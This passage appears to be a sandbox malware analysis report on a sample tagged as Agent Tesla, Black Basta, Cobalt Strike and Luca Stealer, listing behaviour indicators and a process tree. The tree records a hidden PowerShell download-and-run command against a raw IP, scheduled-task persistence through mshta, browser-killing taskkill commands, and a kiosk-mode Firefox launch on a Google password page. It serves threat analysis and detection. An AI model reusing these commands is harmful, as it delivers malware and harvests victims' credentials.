9124	PING.EXE
9236	PING.EXE
8476	PING.EXE
1180	PING.EXE
6804	PING.EXE
8640	PING.EXE
9404	PING.EXE
11352	PING.EXE
7692	PING.EXE
7296	PING.EXE
9396	PING.EXE
10764	PING.EXE
12672	PING.EXE
13088	PING.EXE
3024	PING.EXE
4888	PING.EXE
5552	PING.EXE
10712	PING.EXE
9376	PING.EXE
5492	PING.EXE
7472	PING.EXE
8000	PING.EXE
10040	PING.EXE
12060	PING.EXE
4196	PING.EXE
13568	PING.EXE
13260	PING.EXE
13900	PING.EXE
12316	PING.EXE
12600	PING.EXE
13268	PING.EXE
14116	PING.EXE
7504	PING.EXE
8504	PING.EXE
13888	PING.EXE

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1204	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
3868	taskkill.exe
4276	taskkill.exe
2240	taskkill.exe
4780	taskkill.exe
3820	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rapes.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
4196	PING.EXE
13148	PING.EXE
13984	PING.EXE
7724	PING.EXE
10444	PING.EXE
13360	PING.EXE
14032	PING.EXE
884	PING.EXE
8172	PING.EXE
7472	PING.EXE
6204	PING.EXE
11304	PING.EXE
13448	PING.EXE
12532	PING.EXE
13568	PING.EXE
8972	PING.EXE
10516	PING.EXE
9272	PING.EXE
9200	PING.EXE
5544	PING.EXE
13260	PING.EXE
6924	PING.EXE
8696	PING.EXE
11372	PING.EXE
1180	PING.EXE
7944	PING.EXE
8100	PING.EXE
8640	PING.EXE
9404	PING.EXE
13328	PING.EXE
7324	PING.EXE
9028	PING.EXE
14004	PING.EXE
6708	PING.EXE
8040	PING.EXE
11532	PING.EXE
14204	PING.EXE
1592	PING.EXE
8376	PING.EXE
9124	PING.EXE
1684	PING.EXE
13956	PING.EXE
7444	PING.EXE
7060	PING.EXE
5492	PING.EXE
8160	PING.EXE
8504	PING.EXE
8932	PING.EXE
10392	PING.EXE
13432	PING.EXE
6184	PING.EXE
9396	PING.EXE
12316	PING.EXE
7036	PING.EXE
11352	PING.EXE
12672	PING.EXE
7708	PING.EXE
2116	PING.EXE
9352	PING.EXE
4412	PING.EXE
13656	PING.EXE
10792	PING.EXE
9236	PING.EXE
12320	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4388	schtasks.exe
2260	schtasks.exe
852	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3472	powershell.exe
3472	powershell.exe
1772	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
1772	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
1420	rapes.exe
1420	rapes.exe
4588	mtCxnCB.exe
4588	mtCxnCB.exe
4588	mtCxnCB.exe
4588	mtCxnCB.exe
4588	mtCxnCB.exe
4588	mtCxnCB.exe
3508	MSBuild.exe
3508	MSBuild.exe
3508	MSBuild.exe
3508	MSBuild.exe
4792	2d31581511.exe
4792	2d31581511.exe
4792	2d31581511.exe
4792	2d31581511.exe
4792	2d31581511.exe
4792	2d31581511.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
5668	rapes.exe
5668	rapes.exe
5188	a0c10da70a.exe
5188	a0c10da70a.exe
5188	a0c10da70a.exe
5188	a0c10da70a.exe
4388	powershell.exe
4388	powershell.exe
4388	powershell.exe
4904	TempQIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE
4904	TempQIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE
2752	477a2709cb.exe
2752	477a2709cb.exe
2752	477a2709cb.exe
2752	477a2709cb.exe
2752	477a2709cb.exe
2752	477a2709cb.exe
5360	mtCxnCB.exe
5360	mtCxnCB.exe
5360	mtCxnCB.exe
5360	mtCxnCB.exe
5360	mtCxnCB.exe
5360	mtCxnCB.exe
5364	powershell.exe
5364	powershell.exe
5364	powershell.exe
5456	MSBuild.exe
5456	MSBuild.exe
5456	MSBuild.exe
5456	MSBuild.exe
13472	powershell.exe
13472	powershell.exe
13472	powershell.exe
6328	Jordan.com
6328	Jordan.com
6328	Jordan.com
6328	Jordan.com
6328	Jordan.com

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
652	Process not Found
652	Process not Found
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5764	UZPt0hR.exe
5764	UZPt0hR.exe
5764	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 55 IoCs

description	pid	Process
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	916	5uMVCoG.exe
Token: SeDebugPrivilege	4592	5uMVCoG.exe
Token: SeDebugPrivilege	4276	taskkill.exe
Token: SeDebugPrivilege	2240	taskkill.exe
Token: SeDebugPrivilege	4780	taskkill.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	4724	firefox.exe
Token: SeDebugPrivilege	4724	firefox.exe
Token: SeDebugPrivilege	5236	5uMVCoG.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeDebugPrivilege	5364	powershell.exe
Token: SeDebugPrivilege	13472	powershell.exe
Token: SeDebugPrivilege	7660	tasklist.exe
Token: SeDebugPrivilege	4500	tasklist.exe
Token: SeDebugPrivilege	6772	5uMVCoG.exe
Token: SeDebugPrivilege	7728	91d827b1.exe
Token: SeBackupPrivilege	7728	91d827b1.exe
Token: SeRestorePrivilege	7728	91d827b1.exe
Token: SeLoadDriverPrivilege	7728	91d827b1.exe
Token: SeShutdownPrivilege	7728	91d827b1.exe
Token: SeSystemEnvironmentPrivilege	7728	91d827b1.exe
Token: SeSecurityPrivilege	7728	91d827b1.exe
Token: SeBackupPrivilege	7728	91d827b1.exe
Token: SeRestorePrivilege	7728	91d827b1.exe
Token: SeDebugPrivilege	7728	91d827b1.exe
Token: SeSystemEnvironmentPrivilege	7728	91d827b1.exe
Token: SeSecurityPrivilege	7728	91d827b1.exe
Token: SeCreatePermanentPrivilege	7728	91d827b1.exe
Token: SeShutdownPrivilege	7728	91d827b1.exe
Token: SeLoadDriverPrivilege	7728	91d827b1.exe
Token: SeIncreaseQuotaPrivilege	7728	91d827b1.exe
Token: SeSecurityPrivilege	7728	91d827b1.exe
Token: SeSystemProfilePrivilege	7728	91d827b1.exe
Token: SeDebugPrivilege	7728	91d827b1.exe
Token: SeMachineAccountPrivilege	7728	91d827b1.exe
Token: SeCreateTokenPrivilege	7728	91d827b1.exe
Token: SeAssignPrimaryTokenPrivilege	7728	91d827b1.exe
Token: SeTcbPrivilege	7728	91d827b1.exe
Token: SeAuditPrivilege	7728	91d827b1.exe
Token: SeSystemEnvironmentPrivilege	7728	91d827b1.exe
Token: SeLoadDriverPrivilege	7728	91d827b1.exe
Token: SeLoadDriverPrivilege	7728	91d827b1.exe
Token: SeIncreaseQuotaPrivilege	7728	91d827b1.exe
Token: SeSecurityPrivilege	7728	91d827b1.exe
Token: SeSystemProfilePrivilege	7728	91d827b1.exe
Token: SeDebugPrivilege	7728	91d827b1.exe
Token: SeMachineAccountPrivilege	7728	91d827b1.exe
Token: SeCreateTokenPrivilege	7728	91d827b1.exe
Token: SeAssignPrimaryTokenPrivilege	7728	91d827b1.exe
Token: SeTcbPrivilege	7728	91d827b1.exe
Token: SeAuditPrivilege	7728	91d827b1.exe
Token: SeSystemEnvironmentPrivilege	7728	91d827b1.exe
Token: SeDebugPrivilege	9552	RYZusWg.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
1500	66c8304a39.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
4724	firefox.exe
5348	0ff8e92974.exe
5348	0ff8e92974.exe
5348	0ff8e92974.exe
6328	Jordan.com
6328	Jordan.com
6328	Jordan.com

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
1500	66c8304a39.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
4724	firefox.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
1500	66c8304a39.exe
5348	0ff8e92974.exe
5348	0ff8e92974.exe
5348	0ff8e92974.exe
6328	Jordan.com
6328	Jordan.com
6328	Jordan.com

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4724	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3712 wrote to memory of 4956	3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 3712 wrote to memory of 4956	3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 3712 wrote to memory of 4956	3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 3712 wrote to memory of 4140	3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3712 wrote to memory of 4140	3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3712 wrote to memory of 4140	3712	2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 4956 wrote to memory of 4388	4956	cmd.exe	89
PID 4956 wrote to memory of 4388	4956	cmd.exe	89
PID 4956 wrote to memory of 4388	4956	cmd.exe	89
PID 4140 wrote to memory of 3472	4140	mshta.exe	90
PID 4140 wrote to memory of 3472	4140	mshta.exe	90
PID 4140 wrote to memory of 3472	4140	mshta.exe	90
PID 3472 wrote to memory of 1772	3472	powershell.exe	99
PID 3472 wrote to memory of 1772	3472	powershell.exe	99
PID 3472 wrote to memory of 1772	3472	powershell.exe	99
PID 1772 wrote to memory of 1420	1772	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE	100
PID 1772 wrote to memory of 1420	1772	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE	100
PID 1772 wrote to memory of 1420	1772	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE	100
PID 1420 wrote to memory of 916	1420	rapes.exe	104
PID 1420 wrote to memory of 916	1420	rapes.exe	104
PID 916 wrote to memory of 2260	916	5uMVCoG.exe	105
PID 916 wrote to memory of 2260	916	5uMVCoG.exe	105
PID 3940 wrote to memory of 4592	3940	cmd.exe	109
PID 3940 wrote to memory of 4592	3940	cmd.exe	109
PID 1420 wrote to memory of 4588	1420	rapes.exe	110
PID 1420 wrote to memory of 4588	1420	rapes.exe	110
PID 1420 wrote to memory of 4588	1420	rapes.exe	110
PID 1420 wrote to memory of 2344	1420	rapes.exe	111
PID 1420 wrote to memory of 2344	1420	rapes.exe	111
PID 2344 wrote to memory of 3508	2344	5ffcd2add8.exe	112
PID 2344 wrote to memory of 3508	2344	5ffcd2add8.exe	112
PID 2344 wrote to memory of 3508	2344	5ffcd2add8.exe	112
PID 2344 wrote to memory of 3508	2344	5ffcd2add8.exe	112
PID 2344 wrote to memory of 3508	2344	5ffcd2add8.exe	112
PID 2344 wrote to memory of 3508	2344	5ffcd2add8.exe	112
PID 2344 wrote to memory of 3508	2344	5ffcd2add8.exe	112
PID 2344 wrote to memory of 3508	2344	5ffcd2add8.exe	112
PID 2344 wrote to memory of 3508	2344	5ffcd2add8.exe	112
PID 1420 wrote to memory of 4792	1420	rapes.exe	113
PID 1420 wrote to memory of 4792	1420	rapes.exe	113
PID 1420 wrote to memory of 4792	1420	rapes.exe	113
PID 1420 wrote to memory of 4436	1420	rapes.exe	116
PID 1420 wrote to memory of 4436	1420	rapes.exe	116
PID 1420 wrote to memory of 1500	1420	rapes.exe	124
PID 1420 wrote to memory of 1500	1420	rapes.exe	124
PID 1420 wrote to memory of 1500	1420	rapes.exe	124
PID 1500 wrote to memory of 4276	1500	66c8304a39.exe	125
PID 1500 wrote to memory of 4276	1500	66c8304a39.exe	125
PID 1500 wrote to memory of 4276	1500	66c8304a39.exe	125
PID 1500 wrote to memory of 2240	1500	66c8304a39.exe	127
PID 1500 wrote to memory of 2240	1500	66c8304a39.exe	127
PID 1500 wrote to memory of 2240	1500	66c8304a39.exe	127
PID 1500 wrote to memory of 4780	1500	66c8304a39.exe	129
PID 1500 wrote to memory of 4780	1500	66c8304a39.exe	129
PID 1500 wrote to memory of 4780	1500	66c8304a39.exe	129
PID 1500 wrote to memory of 3820	1500	66c8304a39.exe	131
PID 1500 wrote to memory of 3820	1500	66c8304a39.exe	131
PID 1500 wrote to memory of 3820	1500	66c8304a39.exe	131
PID 1500 wrote to memory of 3868	1500	66c8304a39.exe	133
PID 1500 wrote to memory of 3868	1500	66c8304a39.exe	133
PID 1500 wrote to memory of 3868	1500	66c8304a39.exe	133
PID 1500 wrote to memory of 4572	1500	66c8304a39.exe	135
PID 1500 wrote to memory of 4572	1500	66c8304a39.exe	135
PID 4572 wrote to memory of 4724	4572	firefox.exe	136

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn QmW6umaEFBZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\JYmThoNgF.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn QmW6umaEFBZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\JYmThoNgF.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4388
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\JYmThoNgF.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4140
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3472
  - - C:\Users\Admin\AppData\Local\TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
      "C:\Users\Admin\AppData\Local\TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1772
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1420
      - C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:916
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "5uMVCoG" /tr "C:\Users\Admin\AppData\Roaming\5uMVCoG.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2260
      - C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4588
      - C:\Users\Admin\AppData\Local\Temp\10478860101\5ffcd2add8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478860101\5ffcd2add8.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2344
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3508
      - C:\Users\Admin\AppData\Local\Temp\10478870101\2d31581511.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478870101\2d31581511.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4792
      - C:\Users\Admin\AppData\Local\Temp\10478880101\8ab34a2e7b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478880101\8ab34a2e7b.exe"
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        
        PID:4436
      - C:\Users\Admin\AppData\Local\Temp\10478890101\66c8304a39.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478890101\66c8304a39.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1500
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4276
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2240
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4780
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3820
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3868
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4572
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4724
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {0aa47365-bd7a-4a3f-8ead-2094ec827132} -parentPid 4724 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4724" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:3668
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2476 -prefsLen 27135 -prefMapHandle 2480 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {77cc786e-9e12-4a1f-904b-1b6fb36c85b9} -parentPid 4724 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4724" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:4008
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3796 -prefsLen 25213 -prefMapHandle 3800 -prefMapSize 270279 -jsInitHandle 3804 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3812 -initialChannelId {c9238f4c-aa20-4411-a765-6d6dee41aba4} -parentPid 4724 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4724" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        Checks processor information in registry
        
        PID:1776
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4000 -prefsLen 27325 -prefMapHandle 4004 -prefMapSize 270279 -ipcHandle 3792 -initialChannelId {3e4ba4c0-ee64-4095-8dca-a83f8d1b5cc4} -parentPid 4724 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4724" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:4376
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1672 -prefsLen 34824 -prefMapHandle 1616 -prefMapSize 270279 -jsInitHandle 1620 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3036 -initialChannelId {9f65bc04-fbe0-4255-ab76-c9ced91c0aa2} -parentPid 4724 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4724" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        Checks processor information in registry
        
        PID:1488
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 2956 -prefsLen 35012 -prefMapHandle 5160 -prefMapSize 270279 -ipcHandle 3140 -initialChannelId {cef1d238-f5e6-4ea6-b947-cecf00336a6e} -parentPid 4724 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4724" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        Checks processor information in registry
        
        PID:2712
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3160 -prefsLen 32952 -prefMapHandle 3116 -prefMapSize 270279 -jsInitHandle 5608 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5136 -initialChannelId {34111ef7-f031-497f-aa7c-3ec9805c0cba} -parentPid 4724 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4724" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        Checks processor information in registry
        
        PID:5808
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5696 -prefsLen 32952 -prefMapHandle 5700 -prefMapSize 270279 -jsInitHandle 5704 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5712 -initialChannelId {992cb139-6765-4048-b72f-02b2bc867e53} -parentPid 4724 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4724" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        Checks processor information in registry
        
        PID:5824
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
